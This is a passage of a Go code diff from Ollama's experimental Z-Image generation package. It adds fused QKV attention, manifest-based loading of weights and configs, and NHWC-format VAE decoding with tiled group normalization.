fusedWeight := mlx.Concatenate([]*mlx.Array{qWeight, kWeight, vWeight}, 0)
// Evaluate fused weight to ensure it's materialized
mlx.Eval(fusedWeight)
// Create fused linear layer
fusedLinear := &nn.Linear{Weight: fusedWeight}
// Handle bias if present
if toQ.Bias != nil && toK.Bias != nil && toV.Bias != nil {
fusedBias := mlx.Concatenate([]*mlx.Array{toQ.Bias, toK.Bias, toV.Bias}, 0)
mlx.Eval(fusedBias)
fusedLinear.Bias = fusedBias
}
attn.ToQKV = fusedLinear
attn.Fused = true
}
// Forward computes attention
@@ -148,11 +200,24 @@ func (attn *Attention) Forward(x *mlx.Array, cos, sin *mlx.Array) *mlx.Array {
L := shape[1]
D := shape[2]
// Project Q, K, V
xFlat := mlx.Reshape(x, B*L, D)
q := attn.ToQ.Forward(xFlat)
k := attn.ToK.Forward(xFlat)
v := attn.ToV.Forward(xFlat)
var q, k, v *mlx.Array
if attn.Fused && attn.ToQKV != nil {
// Fused QKV path: single matmul then split
qkv := attn.ToQKV.Forward(xFlat) // [B*L, 3*dim]
// Split into Q, K, V along last dimension
// Each has shape [B*L, dim]
q = mlx.Slice(qkv, []int32{0, 0}, []int32{B * L, attn.Dim})
k = mlx.Slice(qkv, []int32{0, attn.Dim}, []int32{B * L, 2 * attn.Dim})
v = mlx.Slice(qkv, []int32{0, 2 * attn.Dim}, []int32{B * L, 3 * attn.Dim})
} else {
// Separate Q, K, V projections
q = attn.ToQ.Forward(xFlat)
k = attn.ToK.Forward(xFlat)
v = attn.ToV.Forward(xFlat)
}
// Reshape to [B, L, nheads, head_dim]
q = mlx.Reshape(q, B, L, attn.NHeads, attn.HeadDim)
@@ -229,7 +294,7 @@ type TransformerBlock struct {
AttentionNorm2 *nn.RMSNorm `weight:"attention_norm2"`
FFNNorm1 *nn.RMSNorm `weight:"ffn_norm1"`
FFNNorm2 *nn.RMSNorm `weight:"ffn_norm2"`
AdaLN *nn.Linear `weight:"adaLN_modulation.0,optional"` // only if modulation
AdaLN nn.LinearLayer `weight:"adaLN_modulation.0,optional"` // only if modulation
// Computed fields
HasModulation bool
Dim int32
@@ -283,8 +348,8 @@ func (tb *TransformerBlock) Forward(x *mlx.Array, adaln *mlx.Array, cos, sin *ml
// FinalLayer outputs the denoised patches
type FinalLayer struct {
AdaLN *nn.Linear `weight:"adaLN_modulation.1"` // [256] -> [dim]
Output *nn.Linear `weight:"linear"` // [dim] -> [out_channels]
AdaLN nn.LinearLayer `weight:"adaLN_modulation.1"` // [256] -> [dim]
Output nn.LinearLayer `weight:"linear"` // [dim] -> [out_channels]
OutDim int32 // computed from Output
}
@@ -335,43 +400,50 @@ type Transformer struct {
*TransformerConfig
}
// Load loads the Z-Image transformer from a directory
func (m *Transformer) Load(path string) error {
fmt.Println("Loading Z-Image transformer...")
// Load loads the Z-Image transformer from ollama blob storage.
func (m *Transformer) Load(manifest *imagegen.ModelManifest) error {
fmt.Print(" Loading transformer... ")
// Load config
cfg, err := loadTransformerConfig(filepath.Join(path, "config.json"))
if err != nil {
// Load config from blob
var cfg TransformerConfig
if err := manifest.ReadConfigJSON("transformer/config.json", &cfg); err != nil {
return fmt.Errorf("config: %w", err)
}
m.TransformerConfig = cfg
// Pre-allocate slices for loader
if len(cfg.AllPatchSize) > 0 {
cfg.PatchSize = cfg.AllPatchSize[0]
}
m.TransformerConfig = &cfg
m.NoiseRefiners = make([]*TransformerBlock, cfg.NRefinerLayers)
m.ContextRefiners = make([]*TransformerBlock, cfg.NRefinerLayers)
m.Layers = make([]*TransformerBlock, cfg.NLayers)
// Load weights
weights, err := safetensors.LoadModelWeights(path)
weights, err := imagegen.LoadWeightsFromManifest(manifest, "transformer")
if err != nil {
return fmt.Errorf("weights: %w", err)
}
fmt.Print(" Loading weights as bf16... ")
if err := weights.Load(mlx.DtypeBFloat16); err != nil {
if err := weights.Load(0); err != nil {
return fmt.Errorf("load weights: %w", err)
}
fmt.Printf("✓ (%.1f GB)\n", float64(mlx.MetalGetActiveMemory())/(1024*1024*1024))
defer weights.ReleaseAll()
fmt.Print(" Loading weights via struct tags... ")
return m.loadWeights(weights)
}
// loadWeights loads weights from any WeightSource into the model
func (m *Transformer) loadWeights(weights safetensors.WeightSource) error {
if err := safetensors.LoadModule(m, weights, ""); err != nil {
return fmt.Errorf("load module: %w", err)
}
m.initComputedFields()
fmt.Println("✓")
return nil
}
// Initialize computed fields
// initComputedFields initializes computed fields after loading weights
func (m *Transformer) initComputedFields() {
cfg := m.TransformerConfig
m.TEmbed.FreqEmbedSize = 256
m.FinalLayer.OutDim = m.FinalLayer.Output.Weight.Shape()[0]
m.FinalLayer.OutDim = m.FinalLayer.Output.OutputDim()
m.CapEmbed.Norm.Eps = 1e-6
for _, block := range m.NoiseRefiners {
@@ -383,26 +455,20 @@ func (m *Transformer) Load(path string) error {
for _, block := range m.Layers {
initTransformerBlock(block, cfg)
}
weights.ReleaseAll()
return nil
}
// loadTransformerConfig loads transformer config from a JSON file
func loadTransformerConfig(path string) (*TransformerConfig, error) {
data, err := os.ReadFile(path)
if err != nil {
return nil, fmt.Errorf("read config: %w", err)
// FuseAllQKV fuses QKV projections in all attention layers for efficiency.
// This reduces 3 matmuls to 1 per attention layer, providing ~5-10% speedup.
func (m *Transformer) FuseAllQKV() {
for _, block := range m.NoiseRefiners {
block.Attention.FuseQKV()
}
var cfg TransformerConfig
if err := json.Unmarshal(data, &cfg); err != nil {
return nil, fmt.Errorf("parse config: %w", err)
for _, block := range m.ContextRefiners {
block.Attention.FuseQKV()
}
// Extract PatchSize from array
if len(cfg.AllPatchSize) > 0 {
cfg.PatchSize = cfg.AllPatchSize[0]
for _, block := range m.Layers {
block.Attention.FuseQKV()
}
return &cfg, nil
}
// initTransformerBlock sets computed fields on a transformer block
@@ -418,7 +484,7 @@ func initTransformerBlock(block *TransformerBlock, cfg *TransformerConfig) {
attn.Scale = float32(1.0 / math.Sqrt(float64(attn.HeadDim)))
// Init feedforward OutDim
block.FeedForward.OutDim = block.FeedForward.W2.Weight.Shape()[0]
block.FeedForward.OutDim = block.FeedForward.W2.OutputDim()
// Set eps on all RMSNorm layers
block.AttentionNorm1.Eps = cfg.NormEps
@@ -437,6 +503,8 @@ type RoPECache struct {
UnifiedSin *mlx.Array
ImgLen int32
CapLen int32
GridH int32 // Image token grid height
GridW int32 // Image token grid width
}
// PrepareRoPECache precomputes RoPE values for the given image and caption lengths.
@@ -470,6 +538,8 @@ func (m *Transformer) PrepareRoPECache(hTok, wTok, capLen int32) *RoPECache {
UnifiedSin: unifiedSin,
ImgLen: imgLen,
CapLen: capLen,
GridH: hTok,
GridW: wTok,
}
}

View File

@@ -3,12 +3,10 @@
package zimage
import (
"encoding/json"
"fmt"
"math"
"os"
"path/filepath"
"github.com/ollama/ollama/x/imagegen"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/safetensors"
)
@@ -25,19 +23,6 @@ type VAEConfig struct {
ShiftFactor float32 `json:"shift_factor"`
}
// loadVAEConfig loads VAE config from a JSON file
func loadVAEConfig(path string) (*VAEConfig, error) {
data, err := os.ReadFile(path)
if err != nil {
return nil, fmt.Errorf("read config: %w", err)
}
var cfg VAEConfig
if err := json.Unmarshal(data, &cfg); err != nil {
return nil, fmt.Errorf("parse config: %w", err)
}
return &cfg, nil
}
// GroupNormLayer implements group normalization
type GroupNormLayer struct {
Weight *mlx.Array
@@ -57,49 +42,189 @@ func NewGroupNorm(weight, bias *mlx.Array, numGroups int32) *GroupNormLayer {
}
// Forward applies group normalization
// Input and output are in NHWC format [B, H, W, C]
func (gn *GroupNormLayer) Forward(x *mlx.Array) *mlx.Array {
// x: [B, C, H, W]
// x: [B, H, W, C] (NHWC format)
shape := x.Shape()
B := shape[0]
C := shape[1]
H := shape[2]
W := shape[3]
H := shape[1]
W := shape[2]
C := shape[3]
// Reshape to [B, groups, C/groups, H, W]
// For large spatial sizes, use tiled computation to avoid CUDA grid limits
// CUDA grid.y max is 65535, so H*W/16 must be <= 65535, meaning H*W <= ~1M
// To be safe, tile when H*W > 512*512 = 262144
if H*W > 512*512 {
return gn.forwardTiled(x, B, H, W, C)
}
return gn.forwardSmall(x, B, H, W, C)
}
// forwardSmall is the standard GroupNorm for tensors that fit within CUDA grid limits
func (gn *GroupNormLayer) forwardSmall(x *mlx.Array, B, H, W, C int32) *mlx.Array {
// Reshape to [B, H, W, groups, C/groups]
groupSize := C / gn.NumGroups
x = mlx.Reshape(x, B, gn.NumGroups, groupSize, H, W)
x = mlx.Reshape(x, B, H, W, gn.NumGroups, groupSize)
// Compute mean and variance per group
mean := mlx.Mean(x, 2, true)
mean = mlx.Mean(mean, 3, true)
// Compute mean and variance per group (over H, W, and C/groups dimensions)
mean := mlx.Mean(x, 1, true)
mean = mlx.Mean(mean, 2, true)
mean = mlx.Mean(mean, 4, true)
xCentered := mlx.Sub(x, mean)
variance := mlx.Mean(mlx.Square(xCentered), 2, true)
variance = mlx.Mean(variance, 3, true)
// Variance over same axes
sq := mlx.Square(xCentered)
variance := mlx.Mean(sq, 1, true)
variance = mlx.Mean(variance, 2, true)
variance = mlx.Mean(variance, 4, true)
// Normalize
xNorm := mlx.Div(xCentered, mlx.Sqrt(mlx.AddScalar(variance, gn.Eps)))
// Reshape back to [B, C, H, W]
xNorm = mlx.Reshape(xNorm, B, C, H, W)
// Reshape back to [B, H, W, C]
xNorm = mlx.Reshape(xNorm, B, H, W, C)
// Scale and shift (weight and bias are [C])
if gn.Weight != nil {
weight := mlx.Reshape(gn.Weight, 1, C, 1, 1)
weight := mlx.Reshape(gn.Weight, 1, 1, 1, C)
xNorm = mlx.Mul(xNorm, weight)
}
if gn.Bias != nil {
bias := mlx.Reshape(gn.Bias, 1, C, 1, 1)
bias := mlx.Reshape(gn.Bias, 1, 1, 1, C)
xNorm = mlx.Add(xNorm, bias)
}
return xNorm
}
// forwardTiled handles large tensors by processing in H-tiles to avoid CUDA grid limits
func (gn *GroupNormLayer) forwardTiled(x *mlx.Array, B, H, W, C int32) *mlx.Array {
groupSize := C / gn.NumGroups
// Keep the input - we need it for slicing tiles later
// Track if we were the ones who kept it, so we can restore state after
wasKept := x.Kept()
mlx.Keep(x)
// Compute per-group mean and variance using flattened spatial dimensions
// Build the entire compute graph first, then eval once
// Reshape to [B, H*W, groups, groupSize]
xFlat := mlx.Reshape(x, B, H*W, gn.NumGroups, groupSize)
// Mean over spatial (axis 1) and groupSize (axis 3) dimensions
// Result shape: [B, 1, groups, 1]
mean1 := mlx.Mean(xFlat, 1, true)
mean := mlx.Mean(mean1, 3, true)
// Variance using E[X^2] - E[X]^2
xSq := mlx.Square(xFlat)
meanSq1 := mlx.Mean(xSq, 1, true)
meanSq := mlx.Mean(meanSq1, 3, true)
meanSquared := mlx.Square(mean)
variance := mlx.Sub(meanSq, meanSquared)
// invStd = 1/sqrt(var + eps)
varPlusEps := mlx.AddScalar(variance, gn.Eps)
stdDev := mlx.Sqrt(varPlusEps)
one := mlx.Full(1.0, 1)
invStd := mlx.Div(one, stdDev)
// Eval mean and invStd together - these are what we need for the tile loop
mlx.Keep(mean, invStd)
mlx.Eval(mean, invStd)
// Tile along H dimension
tileH := int32(512 * 512 / W)
if tileH < 1 {
tileH = 1
}
if tileH > H {
tileH = H
}
// Prepare weight and bias reshaped for 4D broadcast [1, 1, groups, groupSize]
var weightGN, biasGN *mlx.Array
if gn.Weight != nil {
weightGN = mlx.Reshape(gn.Weight, 1, 1, gn.NumGroups, groupSize)
mlx.Keep(weightGN)
mlx.Eval(weightGN)
}
if gn.Bias != nil {
biasGN = mlx.Reshape(gn.Bias, 1, 1, gn.NumGroups, groupSize)
mlx.Keep(biasGN)
mlx.Eval(biasGN)
}
var tiles []*mlx.Array
for hStart := int32(0); hStart < H; hStart += tileH {
hEnd := hStart + tileH
if hEnd > H {
hEnd = H
}
tileHeight := hEnd - hStart
spatialSize := tileHeight * W
// Build the compute graph for this tile (no intermediate Evals)
// Extract tile and flatten spatial dims: [B, tileH*W, groups, groupSize]
tile := mlx.Slice(x, []int32{0, hStart, 0, 0}, []int32{B, hEnd, W, C})
tileFlat := mlx.Reshape(tile, B, spatialSize, gn.NumGroups, groupSize)
// Normalize: (x - mean) * invStd
tileCentered := mlx.Sub(tileFlat, mean)
tileNorm := mlx.Mul(tileCentered, invStd)
// Apply scale and shift in 4D space
if weightGN != nil {
tileNorm = mlx.Mul(tileNorm, weightGN)
}
if biasGN != nil {
tileNorm = mlx.Add(tileNorm, biasGN)
}
// Reshape back to [B, tileH, W, C]
tileOut := mlx.Reshape(tileNorm, B, tileHeight, W, C)
// Now eval and keep this tile
mlx.Keep(tileOut)
mlx.Eval(tileOut)
tiles = append(tiles, tileOut)
}
// Concatenate tiles along H axis
var result *mlx.Array
if len(tiles) == 1 {
result = tiles[0]
} else {
result = mlx.Concatenate(tiles, 1)
mlx.Eval(result)
// Free the individual tiles now that they're concatenated
for _, t := range tiles {
t.Free()
}
}
// Clean up kept arrays
// Restore x's kept state - only free if we were the ones who kept it
if !wasKept {
x.Free()
}
mean.Free()
invStd.Free()
if weightGN != nil {
weightGN.Free()
}
if biasGN != nil {
biasGN.Free()
}
return result
}
// Conv2D represents a 2D convolution layer
// MLX uses NHWC format, but we store weights in OHWI format for MLX conv
// Works natively in NHWC format (MLX's native format)
type Conv2D struct {
Weight *mlx.Array // [out_channels, kH, kW, in_channels] (OHWI for MLX)
Bias *mlx.Array // [out_channels]
@@ -123,21 +248,17 @@ func NewConv2D(weight, bias *mlx.Array, stride, padding int32) *Conv2D {
}
// Forward applies convolution
// Input x is in NCHW format, we convert to NHWC for MLX, then back to NCHW
// Input and output are in NHWC format [N, H, W, C]
func (conv *Conv2D) Forward(x *mlx.Array) *mlx.Array {
// x: [N, C, H, W] -> [N, H, W, C]
xNHWC := mlx.Transpose(x, 0, 2, 3, 1)
// Conv in NHWC format
outNHWC := mlx.Conv2d(xNHWC, conv.Weight, conv.Stride, conv.Padding)
// Convert back to NCHW: [N, H, W, C] -> [N, C, H, W]
out := mlx.Transpose(outNHWC, 0, 3, 1, 2)
// Conv in NHWC format (MLX native)
out := mlx.Conv2d(x, conv.Weight, conv.Stride, conv.Padding)
if conv.Bias != nil {
bias := mlx.Reshape(conv.Bias, 1, conv.Bias.Dim(0), 1, 1)
// Bias is [C], reshape to [1, 1, 1, C] for NHWC broadcast
bias := mlx.Reshape(conv.Bias, 1, 1, 1, conv.Bias.Dim(0))
out = mlx.Add(out, bias)
}
return out
}
@@ -151,7 +272,7 @@ type ResnetBlock2D struct {
}
// NewResnetBlock2D creates a ResNet block
func NewResnetBlock2D(weights *safetensors.ModelWeights, prefix string, numGroups int32) (*ResnetBlock2D, error) {
func NewResnetBlock2D(weights safetensors.WeightSource, prefix string, numGroups int32) (*ResnetBlock2D, error) {
norm1Weight, err := weights.GetTensor(prefix + ".norm1.weight")
if err != nil {
return nil, err
@@ -216,13 +337,13 @@ func (rb *ResnetBlock2D) Forward(x *mlx.Array) *mlx.Array {
// Stage 1: norm1
{
h = rb.Norm1.Forward(x)
h = rb.Norm1.Forward(x)
mlx.Eval(h)
}
// Stage 2: silu + conv1
{
prev := h
prev := h
h = mlx.SiLU(h)
h = rb.Conv1.Forward(h)
prev.Free()
@@ -231,7 +352,7 @@ func (rb *ResnetBlock2D) Forward(x *mlx.Array) *mlx.Array {
// Stage 3: norm2
{
prev := h
prev := h
h = rb.Norm2.Forward(h)
prev.Free()
mlx.Eval(h)
@@ -239,7 +360,7 @@ func (rb *ResnetBlock2D) Forward(x *mlx.Array) *mlx.Array {
// Stage 4: silu + conv2
{
prev := h
prev := h
h = mlx.SiLU(h)
h = rb.Conv2.Forward(h)
prev.Free()
@@ -248,7 +369,7 @@ func (rb *ResnetBlock2D) Forward(x *mlx.Array) *mlx.Array {
// Residual connection
{
prev := h
prev := h
if rb.ConvShortcut != nil {
shortcut := rb.ConvShortcut.Forward(x)
h = mlx.Add(h, shortcut)
@@ -277,7 +398,7 @@ type VAEAttentionBlock struct {
}
// NewVAEAttentionBlock creates an attention block
func NewVAEAttentionBlock(weights *safetensors.ModelWeights, prefix string, numGroups int32) (*VAEAttentionBlock, error) {
func NewVAEAttentionBlock(weights safetensors.WeightSource, prefix string, numGroups int32) (*VAEAttentionBlock, error) {
normWeight, err := weights.GetTensor(prefix + ".group_norm.weight")
if err != nil {
return nil, err
@@ -338,20 +459,20 @@ func NewVAEAttentionBlock(weights *safetensors.ModelWeights, prefix string, numG
}
// Forward applies attention with staged evaluation
// Input and output are in NHWC format [B, H, W, C]
func (ab *VAEAttentionBlock) Forward(x *mlx.Array) *mlx.Array {
residual := x
shape := x.Shape()
B := shape[0]
C := shape[1]
H := shape[2]
W := shape[3]
H := shape[1]
W := shape[2]
C := shape[3]
var h *mlx.Array
// Stage 1: GroupNorm + reshape
// Stage 1: GroupNorm + reshape to [B, H*W, C]
{
h = ab.GroupNorm.Forward(x)
h = mlx.Transpose(h, 0, 2, 3, 1)
h = ab.GroupNorm.Forward(x)
h = mlx.Reshape(h, B, H*W, C)
mlx.Eval(h)
}
@@ -360,7 +481,7 @@ func (ab *VAEAttentionBlock) Forward(x *mlx.Array) *mlx.Array {
// Stage 2: Q, K, V projections + attention
{
q := mlx.Linear(h, ab.ToQWeight)
q := mlx.Linear(h, ab.ToQWeight)
q = mlx.Add(q, ab.ToQBias)
k := mlx.Linear(h, ab.ToKWeight)
k = mlx.Add(k, ab.ToKBias)
@@ -380,11 +501,10 @@ func (ab *VAEAttentionBlock) Forward(x *mlx.Array) *mlx.Array {
// Stage 3: Output projection + reshape + residual
{
prev := out
prev := out
out = mlx.Linear(out, ab.ToOutWeight)
out = mlx.Add(out, ab.ToOutBias)
out = mlx.Reshape(out, B, H, W, C)
out = mlx.Transpose(out, 0, 3, 1, 2)
out = mlx.Add(out, residual)
prev.Free()
mlx.Eval(out)
@@ -400,7 +520,7 @@ type UpDecoderBlock2D struct {
}
// NewUpDecoderBlock2D creates an up decoder block
func NewUpDecoderBlock2D(weights *safetensors.ModelWeights, prefix string, numLayers, numGroups int32, hasUpsample bool) (*UpDecoderBlock2D, error) {
func NewUpDecoderBlock2D(weights safetensors.WeightSource, prefix string, numLayers, numGroups int32, hasUpsample bool) (*UpDecoderBlock2D, error) {
resnets := make([]*ResnetBlock2D, numLayers)
for i := int32(0); i < numLayers; i++ {
resPrefix := fmt.Sprintf("%s.resnets.%d", prefix, i)
@@ -467,7 +587,7 @@ type VAEMidBlock struct {
}
// NewVAEMidBlock creates the mid block
func NewVAEMidBlock(weights *safetensors.ModelWeights, prefix string, numGroups int32) (*VAEMidBlock, error) {
func NewVAEMidBlock(weights safetensors.WeightSource, prefix string, numGroups int32) (*VAEMidBlock, error) {
resnet1, err := NewResnetBlock2D(weights, prefix+".resnets.0", numGroups)
if err != nil {
return nil, err
@@ -518,22 +638,31 @@ type VAEDecoder struct {
ConvOut *Conv2D
}
// Load loads the VAE decoder from a directory
func (m *VAEDecoder) Load(path string) error {
fmt.Println("Loading VAE decoder...")
// Load config
cfg, err := loadVAEConfig(filepath.Join(path, "config.json"))
if err != nil {
// Load loads the VAE decoder from ollama blob storage.
func (m *VAEDecoder) Load(manifest *imagegen.ModelManifest) error {
// Load config from blob
var cfg VAEConfig
if err := manifest.ReadConfigJSON("vae/config.json", &cfg); err != nil {
return fmt.Errorf("config: %w", err)
}
m.Config = cfg
m.Config = &cfg
// Load weights
weights, err := safetensors.LoadModelWeights(path)
// Load weights from tensor blobs
weights, err := imagegen.LoadWeightsFromManifest(manifest, "vae")
if err != nil {
return fmt.Errorf("weights: %w", err)
}
if err := weights.Load(0); err != nil {
return fmt.Errorf("load weights: %w", err)
}
defer weights.ReleaseAll()
return m.loadWeights(weights, &cfg)
}
// loadWeights loads VAE weights from any WeightSource
func (m *VAEDecoder) loadWeights(weights safetensors.WeightSource, cfg *VAEConfig) error {
var err error
// Load conv_in
fmt.Print(" Loading conv_in... ")
@@ -596,57 +725,79 @@ func (m *VAEDecoder) Load(path string) error {
m.ConvOut = NewConv2D(convOutWeight, convOutBias, 1, 1)
fmt.Println("✓")
weights.ReleaseAll()
return nil
}
// Decode decodes latents to images.
// Uses staged pools to free intermediate arrays and reduce peak memory.
// Input latents are in NCHW format, output is in NCHW format.
// Internally uses NHWC format (MLX native) for all operations.
func (vae *VAEDecoder) Decode(latents *mlx.Array) *mlx.Array {
var h *mlx.Array
{
z := mlx.DivScalar(latents, vae.Config.ScalingFactor)
z = mlx.AddScalar(z, vae.Config.ShiftFactor)
h = vae.ConvIn.Forward(z)
mlx.Eval(h)
}
// Scale latents
z := mlx.DivScalar(latents, vae.Config.ScalingFactor)
z = mlx.AddScalar(z, vae.Config.ShiftFactor)
// Convert NCHW -> NHWC for internal processing
z = mlx.Transpose(z, 0, 2, 3, 1)
h := vae.ConvIn.Forward(z)
mlx.Eval(h)
prev := h
h = vae.MidBlock.Forward(h)
prev.Free()
for _, upBlock := range vae.UpBlocks {
prev = h
h = upBlock.Forward(h)
prev.Free()
}
{
prev := h
h = vae.ConvNormOut.Forward(h)
h = mlx.SiLU(h)
h = vae.ConvOut.Forward(h)
// VAE outputs [-1, 1], convert to [0, 1]
h = mlx.AddScalar(mlx.MulScalar(h, 0.5), 0.5)
h = mlx.ClipScalar(h, 0.0, 1.0, true, true)
prev.Free()
mlx.Eval(h)
}
prev = h
h = vae.ConvNormOut.Forward(h)
mlx.Eval(h) // Eval after GroupNorm to avoid grid dimension issues
prev.Free()
prev = h
h = mlx.SiLU(h)
h = vae.ConvOut.Forward(h)
mlx.Eval(h)
prev.Free()
// VAE outputs [-1, 1], convert to [0, 1]
h = mlx.MulScalar(h, 0.5)
h = mlx.AddScalar(h, 0.5)
h = mlx.ClipScalar(h, 0.0, 1.0, true, true)
// Convert NHWC -> NCHW for output
h = mlx.Transpose(h, 0, 3, 1, 2)
mlx.Eval(h)
return h
}
// Upsample2x performs 2x nearest neighbor upsampling using broadcast.
// x: [B, C, H, W] -> [B, C, H*2, W*2]
// Upsample2x performs 2x nearest neighbor upsampling using Take.
// Input and output are in NHWC format: [B, H, W, C] -> [B, H*2, W*2, C]
// Uses Take with repeated indices to produce contiguous output.
func Upsample2x(x *mlx.Array) *mlx.Array {
shape := x.Shape()
B := shape[0]
C := shape[1]
H := shape[2]
W := shape[3]
H := shape[1]
W := shape[2]
// [B, C, H, W] -> [B, C, H, 1, W, 1]
x = mlx.Reshape(x, B, C, H, 1, W, 1)
// Broadcast to [B, C, H, 2, W, 2]
x = mlx.BroadcastTo(x, []int32{B, C, H, 2, W, 2})
// Reshape to [B, C, H*2, W*2]
x = mlx.Reshape(x, B, C, H*2, W*2)
// Create indices [0, 0, 1, 1, 2, 2, ...] for nearest neighbor
// For H dimension
hIdx := mlx.ArangeInt(0, H, 1, mlx.DtypeInt32)
hIdx = mlx.Reshape(hIdx, H, 1)
hIdx = mlx.BroadcastTo(hIdx, []int32{H, 2})
hIdx = mlx.Reshape(hIdx, H*2)
// For W dimension
wIdx := mlx.ArangeInt(0, W, 1, mlx.DtypeInt32)
wIdx = mlx.Reshape(wIdx, W, 1)
wIdx = mlx.BroadcastTo(wIdx, []int32{W, 2})
wIdx = mlx.Reshape(wIdx, W*2)
// Take along H axis (axis 1 in NHWC)
x = mlx.Take(x, hIdx, 1)
// Take along W axis (axis 2 in NHWC)
x = mlx.Take(x, wIdx, 2)
return x
}

View File

@@ -6,9 +6,9 @@ package zimage
import (
"context"
"fmt"
"path/filepath"
"time"
"github.com/ollama/ollama/x/imagegen"
"github.com/ollama/ollama/x/imagegen/cache"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/tokenizer"
@@ -26,10 +26,12 @@ type GenerateConfig struct {
Progress ProgressFunc // Optional progress callback
CapturePath string // GPU capture path (debug)
// Layer caching options (speedup via shallow layer reuse)
LayerCache bool // Enable layer caching (default: false)
CacheInterval int // Refresh cache every N steps (default: 3)
CacheLayers int // Number of shallow layers to cache (default: 15)
// TeaCache options (timestep embedding aware caching)
TeaCache bool // TeaCache is always enabled for faster inference
TeaCacheThreshold float32 // Threshold for cache reuse (default: 0.1, lower = more aggressive)
// Fused QKV (fuse Q/K/V projections into single matmul)
FusedQKV bool // Enable fused QKV projection (default: false)
}
// ProgressFunc is called during generation with step progress.
@@ -37,16 +39,17 @@ type ProgressFunc func(step, totalSteps int)
// Model represents a Z-Image diffusion model.
type Model struct {
ModelPath string
ModelName string
Tokenizer *tokenizer.Tokenizer
TextEncoder *Qwen3TextEncoder
Transformer *Transformer
VAEDecoder *VAEDecoder
qkvFused bool // Track if QKV has been fused (do only once)
}
// Load loads the Z-Image model from a directory.
func (m *Model) Load(modelPath string) error {
fmt.Println("Loading Z-Image model...")
// Load loads the Z-Image model from ollama blob storage.
func (m *Model) Load(modelName string) error {
fmt.Printf("Loading Z-Image model from manifest: %s...\n", modelName)
start := time.Now()
if mlx.GPUIsAvailable() {
@@ -54,12 +57,34 @@ func (m *Model) Load(modelPath string) error {
mlx.EnableCompile()
}
m.ModelPath = modelPath
m.ModelName = modelName
// Load tokenizer
// Load manifest
manifest, err := imagegen.LoadManifest(modelName)
if err != nil {
return fmt.Errorf("load manifest: %w", err)
}
// Load tokenizer from manifest with config
fmt.Print(" Loading tokenizer... ")
tokenizerPath := filepath.Join(modelPath, "tokenizer", "tokenizer.json")
tok, err := tokenizer.Load(tokenizerPath)
tokData, err := manifest.ReadConfig("tokenizer/tokenizer.json")
if err != nil {
return fmt.Errorf("tokenizer: %w", err)
}
// Try to read tokenizer config files from manifest
tokConfig := &tokenizer.TokenizerConfig{}
if data, err := manifest.ReadConfig("tokenizer/tokenizer_config.json"); err == nil {
tokConfig.TokenizerConfigJSON = data
}
if data, err := manifest.ReadConfig("tokenizer/generation_config.json"); err == nil {
tokConfig.GenerationConfigJSON = data
}
if data, err := manifest.ReadConfig("tokenizer/special_tokens_map.json"); err == nil {
tokConfig.SpecialTokensMapJSON = data
}
tok, err := tokenizer.LoadFromBytesWithConfig(tokData, tokConfig)
if err != nil {
return fmt.Errorf("tokenizer: %w", err)
}
@@ -68,7 +93,7 @@ func (m *Model) Load(modelPath string) error {
// Load text encoder
m.TextEncoder = &Qwen3TextEncoder{}
if err := m.TextEncoder.Load(filepath.Join(modelPath, "text_encoder")); err != nil {
if err := m.TextEncoder.Load(manifest); err != nil {
return fmt.Errorf("text encoder: %w", err)
}
mlx.Eval(mlx.Collect(m.TextEncoder)...)
@@ -78,7 +103,7 @@ func (m *Model) Load(modelPath string) error {
// Load transformer
m.Transformer = &Transformer{}
if err := m.Transformer.Load(filepath.Join(modelPath, "transformer")); err != nil {
if err := m.Transformer.Load(manifest); err != nil {
return fmt.Errorf("transformer: %w", err)
}
mlx.Eval(mlx.Collect(m.Transformer)...)
@@ -88,7 +113,7 @@ func (m *Model) Load(modelPath string) error {
// Load VAE decoder
m.VAEDecoder = &VAEDecoder{}
if err := m.VAEDecoder.Load(filepath.Join(modelPath, "vae")); err != nil {
if err := m.VAEDecoder.Load(manifest); err != nil {
return fmt.Errorf("VAE decoder: %w", err)
}
mlx.Eval(mlx.Collect(m.VAEDecoder)...)
@@ -104,7 +129,7 @@ func (m *Model) Load(modelPath string) error {
// Generate creates an image from a prompt.
func (m *Model) Generate(prompt string, width, height int32, steps int, seed int64) (*mlx.Array, error) {
return m.GenerateFromConfig(&GenerateConfig{
return m.GenerateFromConfig(context.Background(), &GenerateConfig{
Prompt: prompt,
Width: width,
Height: height,
@@ -115,7 +140,7 @@ func (m *Model) Generate(prompt string, width, height int32, steps int, seed int
// GenerateWithProgress creates an image with progress callback.
func (m *Model) GenerateWithProgress(prompt string, width, height int32, steps int, seed int64, progress ProgressFunc) (*mlx.Array, error) {
return m.GenerateFromConfig(&GenerateConfig{
return m.GenerateFromConfig(context.Background(), &GenerateConfig{
Prompt: prompt,
Width: width,
Height: height,
@@ -127,7 +152,7 @@ func (m *Model) GenerateWithProgress(prompt string, width, height int32, steps i
// GenerateWithCFG creates an image with classifier-free guidance.
func (m *Model) GenerateWithCFG(prompt, negativePrompt string, width, height int32, steps int, seed int64, cfgScale float32, progress ProgressFunc) (*mlx.Array, error) {
return m.GenerateFromConfig(&GenerateConfig{
return m.GenerateFromConfig(context.Background(), &GenerateConfig{
Prompt: prompt,
NegativePrompt: negativePrompt,
CFGScale: cfgScale,
@@ -140,9 +165,9 @@ func (m *Model) GenerateWithCFG(prompt, negativePrompt string, width, height int
}
// GenerateFromConfig generates an image using the unified config struct.
func (m *Model) GenerateFromConfig(cfg *GenerateConfig) (*mlx.Array, error) {
func (m *Model) GenerateFromConfig(ctx context.Context, cfg *GenerateConfig) (*mlx.Array, error) {
start := time.Now()
result, err := m.generate(cfg)
result, err := m.generate(ctx, cfg)
if err != nil {
return nil, err
}
@@ -160,7 +185,7 @@ func (m *Model) GenerateImage(ctx context.Context, prompt string, width, height
}
// generate is the internal denoising pipeline.
func (m *Model) generate(cfg *GenerateConfig) (*mlx.Array, error) {
func (m *Model) generate(ctx context.Context, cfg *GenerateConfig) (*mlx.Array, error) {
// Apply defaults
if cfg.Width <= 0 {
cfg.Width = 1024
@@ -169,18 +194,22 @@ func (m *Model) generate(cfg *GenerateConfig) (*mlx.Array, error) {
cfg.Height = 1024
}
if cfg.Steps <= 0 {
cfg.Steps = 9 // Turbo default
cfg.Steps = 9 // Z-Image turbo default
}
if cfg.CFGScale <= 0 {
cfg.CFGScale = 4.0
}
if cfg.LayerCache {
if cfg.CacheInterval <= 0 {
cfg.CacheInterval = 3
}
if cfg.CacheLayers <= 0 {
cfg.CacheLayers = 15 // Half of 30 layers
}
// TeaCache enabled by default
